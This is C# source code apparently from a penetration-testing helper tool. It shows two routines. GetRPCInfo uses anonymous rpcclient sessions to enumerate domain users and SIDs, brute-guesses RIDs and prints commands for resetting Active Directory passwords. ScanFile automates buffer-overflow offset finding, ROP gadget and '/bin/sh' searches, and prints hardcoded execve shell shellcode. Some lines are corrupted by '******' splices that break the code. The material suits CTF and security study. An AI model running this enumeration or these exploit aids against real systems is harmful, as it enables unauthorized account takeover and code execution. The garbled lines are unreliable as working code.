private static string GetRPCInfo(string ip)
{
string rpcInfo = "";
bool anonAccess = false;
if (General.GetOS() == General.OS.Linux)
{
if (General.IsInstalledOnLinux("rpcclient", "/usr/bin/rpcclient"))
{
// Find the Domain Name
List <string> domainNameList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lsaquery\"");
domainNameList.RemoveAll(x => !x.StartsWith("Domain Name:"));
if (domainNameList.Count == 1)
{
anonAccess = true;
rpcInfo += "- " + domainNameList[0] + Environment.NewLine;
}
// Find basic users
List <string> enumdomusersList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"enumdomusers\"");
if (enumdomusersList.Count == 0)
{
List <string> srvinfoList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"srvinfo\"");
if (srvinfoList.Count != 0)
{
anonAccess = true;
rpcInfo += "- srvinfo: " + srvinfoList[0] + Environment.NewLine;
}
// Find public SIDs with lsaenumsid
List <string> sidList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lsaenumsid\"");
if (sidList.Count != 0)
{
anonAccess = true;
rpcInfo += "- Found SIDs" + Environment.NewLine;
// Remove the "found X SIDs" text
sidList.RemoveAll(x => x.StartsWith("found "));
// Remove blanks
sidList.RemoveAll(x => string.IsNullOrEmpty(x));
string sidListString = string.Join(' ', sidList);
// Enumerate the rest
List <string> sidResolution = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lookupsids {sidListString}\"");
if (sidResolution.Count != 0)
{
foreach (string result in sidResolution)
{
rpcInfo += "-- " + result + Environment.NewLine;
}
}
}
// Find sneaky SIDs
List <string> sneakyNameLookup = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lookupnames administrator guest krbtgt root bin none");
sneakyNameLookup.RemoveAll(x => !x.Contains("(User: "******"-") + 1);
if (!sneakySIDBaseList.Contains(sneakySIDBase))
{
sneakySIDBaseList.Add(sneakySIDBase);
}
}
}
if (sneakySIDBaseList.Count != 0)
{
List <string> sneakySIDList = new List <string>();
foreach (string sneakyBase in sneakySIDBaseList)
{
// Low ones are just system names - Can ignore them - Proper ones start from 1000
sneakySIDList.Add(sneakyBase + "1000");
sneakySIDList.Add(sneakyBase + "1001");
sneakySIDList.Add(sneakyBase + "1002");
sneakySIDList.Add(sneakyBase + "1003");
sneakySIDList.Add(sneakyBase + "1004");
sneakySIDList.Add(sneakyBase + "1005");
sneakySIDList.Add(sneakyBase + "1006");
sneakySIDList.Add(sneakyBase + "1007");
sneakySIDList.Add(sneakyBase + "1008");
sneakySIDList.Add(sneakyBase + "1009");
sneakySIDList.Add(sneakyBase + "1010");
List <string> sneakySIDLookup = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lookupsids " + string.Join(" ", sneakySIDList) + "\"");
if (sneakySIDLookup.Count != 0)
{
foreach (string lookupResult in sneakySIDLookup)
{
string name = lookupResult.Substring(0, lookupResult.IndexOf(" (1)"));
name = name.Remove(0, name.LastIndexOf("\\") + 1);
// Invalid ones simply have the number itself instead of the name
// A bit hacky, but it works
if (!int.TryParse(name, out int toIgnore))
{
rpcInfo += "-- Sneaky Name Found: " + name + Environment.NewLine;
}
}
}
}
}
}
}
else // Count > 0
{
string firstItem = enumdomusersList[0];
if (firstItem.Contains("user:"******"rid:"))
{
// All is fine
if (enumdomusersList.Count >= 3)
{
Console.WriteLine("Found a lot of useful RPC info - Output may take a few seconds longer than expected");
}
rpcInfo = "- User Listing" + Environment.NewLine;
foreach (string user in enumdomusersList)
{
rpcInfo += QueryEnumDomUser(ip, user);
}
// 23 -> https://room362.com/post/2017/reset-ad-user-password-with-linux/
rpcInfo += "--> rpcclient -> setuserinfo2 userNameHere 23 'newPasswordHere'" + Environment.NewLine;
}
else if (firstItem == "Cannot connect to server. Error was NT_STATUS_RESOURCE_NAME_NOT_FOUND")
{
rpcInfo = "- Cannot connect - Are you sure it's up?" + Environment.NewLine;
}
else if (firstItem == "Cannot connect to server. Error was NT_STATUS_IO_TIMEOUT")
{
rpcInfo = "- Cannot connect - It timed out :<" + Environment.NewLine;
}
else if (firstItem == "Cannot connect to server. Error was NT_STATUS_CONNECTION_DISCONNECTED")
{
rpcInfo = "- Cannot connect - It kicks you out instantly" + Environment.NewLine;
}
else
{
foreach (string item in enumdomusersList)
{
Console.WriteLine("Debug Info item: " + item);
}
rpcInfo = "- Unknown items in NETBIOS.GetRPCInfo - Bug Reelix (Check Debug Info Item output)" + Environment.NewLine;
}
}
if (anonAccess == true)
{
rpcInfo += "- " + $"Anonymous access permitted! -> rpcclient -U \"\"%\"\" {ip}".Pastel(Color.Orange) + Environment.NewLine;
}
else
{
rpcInfo += "- No anonymous RPC access" + Environment.NewLine;
// 23 -> https://room362.com/post/2017/reset-ad-user-password-with-linux/
rpcInfo += "-- If you get access -> enumdomusers / queryuser usernameHere / setuserinfo2 userNameHere 23 'newPasswordHere'" + Environment.NewLine;
}
}
else
{
rpcInfo = "- Error: Cannot find /usr/bin/rpcclient - Please install smbclient (Includes it)".Pastel(Color.Red) + Environment.NewLine;
}
}
else
{
rpcInfo = "- No RPC Info - Try run on Linux (rpcclient)" + Environment.NewLine;
}
return(rpcInfo);
}
private static void ScanFile(string fileName)
{
if (!fileName.StartsWith("./"))
{
Console.WriteLine("fileName must start with ./");
return;
}
Architecture architecture = IDElf(fileName);
if (architecture == Architecture.x86)
{
Console.WriteLine("Architecture: x86");
// You can get a segfault address of x86 programs by going
// dmesg | tail -2 (Sometimes the last entry isn't for it)
// dmesg | grep "ret2win32" | tail -1
// pwn cyclic 500
// aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae
if (General.IsInstalledOnLinux("pwn"))
{
General.RunProcess("/bin/bash", " -c \"echo 'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae' | " + fileName + "\"", 5);
List <string> dmesgOutput = General.GetProcessOutput("dmesg", "");
foreach (string item in dmesgOutput)
{
// segfault at 6161616c ip 000000006161616c x
if (item.Contains(fileName.TrimStart("./".ToCharArray())) && item.Contains("segfault at "))
{
// Console.WriteLine("-- Item: " + item);
string segfaultHex = item.Remove(0, item.IndexOf("segfault at ") + 12).Substring(0, 9).Trim();
// Console.WriteLine("-- segfaultHex: " + segfaultHex);
string pwntoolsSearch = (new string(HEX2ASCII(segfaultHex).Reverse().ToArray()));
// Console.WriteLine("-- pwntoolsSearch: " + segfaultHex);
string pwnPos = General.GetProcessOutput("pwn", "cyclic -l " + pwntoolsSearch).First();
Console.WriteLine("- Cyclic Segfault Overflow Position: " + pwnPos);
}
}
}
else
{
Console.WriteLine("- pwntools is not installed - Skipping auto segfault");
}
}
else if (architecture == Architecture.x64)
{
Console.WriteLine("Architecture: x64");
// TODO: Find where it segfaults, -1
}
else
{
Console.WriteLine("Architecture: Unknown - Can only deal with ELFs");
}
if (General.IsInstalledOnLinux("ropper"))
{
List <string> ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"ret;\"");
foreach (string item in ropperOutput)
{
if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]"))
{
string pwnItem = item.Trim();
pwnItem = pwnItem.Replace(": ret;", "");
if (pwnItem.Length == 18) // x64
{
pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
// 0x16 - x64 address
}
else
{
Console.WriteLine("Not 18 - " + pwnItem.Length);
}
Console.WriteLine("- ret; (Only function calls) --> " + pwnItem);
}
}
ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"pop rdi; ret;\"");
foreach (string item in ropperOutput)
{
if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]"))
{
string pwnItem = item.Trim();;
pwnItem = pwnItem.Replace(": pop rdi; ret;", "");
if (pwnItem.Length == 18)
{
pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
// 0x16 - x64 address
}
else
{
Console.WriteLine("Not 18 - " + pwnItem.Length);
}
Console.WriteLine("- pop rdi; ret; (Can set values) --> " + pwnItem);
}
}
ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --string \"/bin/sh\"");
foreach (string item in ropperOutput)
{
if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]") && item.Contains("/bin/sh"))
{
string pwnItem = item.Trim();
pwnItem = pwnItem.Replace("/bin/sh", "").Trim();;
if (pwnItem.Length == 10)
{
pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
// 0x16 - x64 address
}
else
{
Console.WriteLine("Not 10 - " + pwnItem.Length);
}
Console.WriteLine("- /bin/sh --> " + pwnItem);
}
}
// // ropper --file sudo_pwn_file_here --string "/bin/sh"
}
else
{
Console.WriteLine("- ropper is not installed - Skipping gadget check and string search");
}
if (General.IsInstalledOnLinux("rabin2"))
{
List <string> rabin2Output = General.GetProcessOutput("rabin2", "-I ./" + fileName);
foreach (string item in rabin2Output)
{
if (item.Trim().StartsWith("nx") && item.Contains("false"))
{
Console.WriteLine("- nx is disabled - You can run your own shellcode!");
if (architecture == Architecture.x64)
{
Console.WriteLine(@"Linux/x86-64 - Execute /bin/sh: \x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05");
}
else
{
// http://shell-storm.org/shellcode/
Console.WriteLine("Bug Reelix to fix his code!");
}
}
else if (item.Trim().StartsWith("nx") && item.Contains("true"))
{
Console.WriteLine("- nx is enabled - No custom shellcode for you!");
}
}
}
else
{
Console.WriteLine("- rabin2 is not installed - Skipping nx check");
}
if (General.IsInstalledOnLinux("objdump"))
{
List <string> objdumpOutput = General.GetProcessOutput("objdump", $"-D {fileName}");
foreach (string item in objdumpOutput)
{
if (item.Contains("call") && item.Contains("system")) // callq contains call
{
Console.WriteLine("- system --> " + item);
}
if (item.Trim().EndsWith(" <puts@plt>:"))
{
Console.WriteLine("- puts@plt (plt_puts) --> " + item);
}
if (item.Contains("puts@GLIBC"))
{
Console.WriteLine("- puts@GLIBC (got_puts) --> " + item);
}
}
objdumpOutput = General.GetProcessOutput("objdump", $"-t {fileName}");
foreach (string item in objdumpOutput)
{
// .text = Name
// " g" = Global
if (item.Contains(".text") && item.Contains(" g "))
{
Console.WriteLine("- Useful Symbol: " + item);
}
}
// objdump -t ./file.elf | grep .text
}
else
{
Console.WriteLine("- objdump is not installed - Skipping syscalls");
}
Console.WriteLine("Finished");
}
